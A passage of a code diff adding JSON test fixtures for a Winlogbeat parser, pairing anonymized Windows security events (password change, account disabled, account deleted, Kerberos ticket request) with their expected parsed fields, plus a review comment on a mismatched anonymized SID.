+ "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}"
+ },
+ "expected": {
+ "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's 
password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
+ "event": {
+ "action": "User Account 
Management",
+ "code": "4723",
+ "kind": "event",
+ "module": "security",
+ "original": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-",
+ "outcome": "success",
+ "provider": "Microsoft-Windows-Security-Auditing"
+ },
+ "@timestamp": "2024-11-12T08:59:04.757000Z",
+ "action": {
+ "id": 4723,
+ "outcome": "success",
+ "properties": {
+ "PrivilegeList": "-",
+ "SubjectDomainName": "DOMAIN",
+ "SubjectLogonId": "0x4a28ebbf",
+ "SubjectUserName": "ACCOUNT",
+ "SubjectUserSid": "S-1-2-3",
+ "TargetDomainName": "DOMAIN",
+ "TargetSid": "S-1-2-3",
+ "TargetUserName": "ACCOUNT"
+ }
+ },
+ "agent": {
+ "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333",
+ "id": "123456-abcd-ef90-1234-abcdef123456",
+ "name": "PC01",
+ "type": "filebeat",
+ "version": "8.14.1"
+ },
+ "host": {
+ "architecture": "x86_64",
+ "hostname": "pc01",
+ "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
+ "ip": [
+ "1.2.3.4"
+ ],
+ "mac": [
+ "00-11-22-33-44-55"
+ ],
+ "name": "pc01",
+ "os": {
+ "build": "17763.6414",
+ "family": "windows",
+ "kernel": "10.0.17763.6414 (WinBuild.160101.0800)",
+ "name": "Windows Server 2019 Standard",
+ "platform": "windows",
+ "type": "windows",
+ "version": "10.0"
+ }
+ },
+ "log": {
+ "level": "information"
+ },
+ "related": {
+ "hosts": [
+ "pc01"
+ ],
+ "ip": [
+ "1.2.3.4"
+ ],
+ "user": [
+ "ACCOUNT"
+ ]
+ },
+ "user": {
+ "domain": "DOMAIN",
+ "id": "S-1-2-3",
+ "name": "ACCOUNT",
+ "target": {
+ "domain": "DOMAIN",
+ "name": "ACCOUNT"
+ }
+ },
+ "winlog": {
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "PC01.domain.com",
+ "event_id": "4723",
+ "keywords": [
+ "Audit Success"
+ ],
+ "logon": {
+ "id": "0x4a28ebbf"
+ },
+ "opcode": "Info",
+ "process": {
+ "pid": 
756,
+ "thread": {
+ "id": 11608
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "13043050897",
+ "task": "User Account Management"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json
new file mode 100644
index 000000000..31cca5f97
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4725.json
@@ -0,0 +1,111 @@
+{
+ "input": {
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Elastic Winlogbeat",
+ "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+ }
+ },
+ "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}"
+ },
+ "expected": {
+ "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon 
ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
+ "event": {
+ "action": "User Account Management",
+ "code": "4725",
+ "kind": "event",
+ "module": "security",
+ "original": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount 
Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN",
+ "outcome": "success",
+ "provider": "Microsoft-Windows-Security-Auditing"
+ },
+ "@timestamp": "2024-11-12T08:41:11.055000Z",
+ "action": {
+ "id": 4725,
+ "outcome": "success",
+ "properties": {
+ "SubjectDomainName": "DOMAIN",
+ "SubjectLogonId": "0x493fa12d",
+ "SubjectUserName": "jdoe",
+ "SubjectUserSid": "S-1-2-3",
+ "TargetDomainName": "DOMAIN",
+ "TargetSid": "S-4-5-6",
+ "TargetUserName": "ACCOUNT"
+ }
+ },
+ "agent": {
+ "ephemeral_id": "11111111-2222-3333-4444-555555555555",
+ "id": "12345678-abcd-ef90-1234-abcdef123456",
+ "name": "PC01",
+ "type": "filebeat",
+ "version": "8.14.1"
+ },
+ "host": {
+ "architecture": "x86_64",
+ "hostname": "pc01",
+ "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
+ "ip": [
+ "1.2.3.4"
+ ],
+ "mac": [
+ "00-11-22-33-44-55"
+ ],
+ "name": "pc01",
+ "os": {
+ "build": "17763.6414",
+ "family": "windows",
+ "kernel": "10.0.17763.6414 (WinBuild.160101.0800)",
+ "name": "Windows Server 2019 Standard",
+ "platform": "windows",
+ "type": "windows",
+ "version": "10.0"
+ }
+ },
+ "log": {
+ "level": "information"
+ },
+ "related": {
+ "hosts": [
+ "pc01"
+ ],
+ "ip": [
+ "1.2.3.4"
+ ],
+ "user": [
+ "jdoe"
+ ]
+ },
+ "user": {
+ "domain": "DOMAIN",
+ "id": "S-1-2-3",
+ "name": "jdoe",
+ "target": {
+ "domain": "DOMAIN",
+ "name": "ACCOUNT"
+ }
+ },
+ "winlog": {
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "PC01.domain.com",
+ "event_id": "4725",
+ "keywords": [
+ "Audit Success"
+ ],
+ "logon": {
+ "id": "0x493fa12d"
+ },
+ "opcode": "Info",
+ "process": {
+ "pid": 756,
+ "thread": {
+ "id": 7304
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "13042691344",
+ "task": "User Account Management"
+ }
+ }
+}
\ No newline at end of file
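Review bot: The 4725 fixture is internally inconsistent after anonymization: `event_data.TargetSid` is `"S-4-5-6"` while the message text of the same record says `Target Account: Security ID: S-1-2-3-4-5`, and the expected `action.properties.TargetSid` follows the former. The test passes because the parser reads `event_data` rather than the message text, but a reader comparing `event.original` against `action.properties` will suspect a parsing bug; aligning both to `S-1-2-3-4-5`, as the 4722 fixture does, keeps the fixture self-consistent.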
diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json
new file mode 100644
index 000000000..e147e2eb4
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4726.json
@@ -0,0 +1,84 @@
+{
+ "input": {
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Elastic Winlogbeat",
+ "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+ }
+ },
+ "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}"
+ },
+ "expected": {
+ "message": 
"{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", + "event": { + "action": "User Account Management", + "code": "4726", + "kind": "event", + "module": "security", + "original": "A user account was deleted.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tdoe.j\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3005C1F76\n\nTarget 
Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tsmithee.a\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t-",
+ "outcome": "success",
+ "provider": "Microsoft-Windows-Security-Auditing"
+ },
+ "@timestamp": "2024-11-12T07:58:13.288000Z",
+ "action": {
+ "id": 4726,
+ "outcome": "success",
+ "properties": {
+ "PrivilegeList": "-",
+ "SubjectDomainName": "DOMAIN",
+ "SubjectLogonId": "0x3005c1f76",
+ "SubjectUserName": "doe.j",
+ "SubjectUserSid": "S-1-2-3",
+ "TargetDomainName": "DOMAIN",
+ "TargetSid": "S-1-2-3-4-5",
+ "TargetUserName": "smithee.a"
+ }
+ },
+ "agent": {
+ "ephemeral_id": "11111111-2222-3333-4444-555555555555",
+ "id": "12345678-ABCD-ef90-1234-abcdef123456",
+ "name": "hostname",
+ "type": "winlogbeat",
+ "version": "7.17.1"
+ },
+ "host": {
+ "name": "hostname.domain.net"
+ },
+ "log": {
+ "level": "information"
+ },
+ "related": {
+ "user": [
+ "doe.j"
+ ]
+ },
+ "user": {
+ "domain": "DOMAIN",
+ "id": "S-1-2-3",
+ "name": "doe.j",
+ "target": {
+ "domain": "DOMAIN",
+ "name": "smithee.a"
+ }
+ },
+ "winlog": {
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "hostname.domain.net",
+ "event_id": "4726",
+ "logon": {
+ "id": "0x3005c1f76"
+ },
+ "process": {
+ "pid": 632,
+ "thread": {
+ "id": 2056
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "25349190364",
+ "task": "User Account Management"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json
new file mode 100644
index 000000000..53d650df2
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4768.json
@@ -0,0 +1,102 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de 
l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de 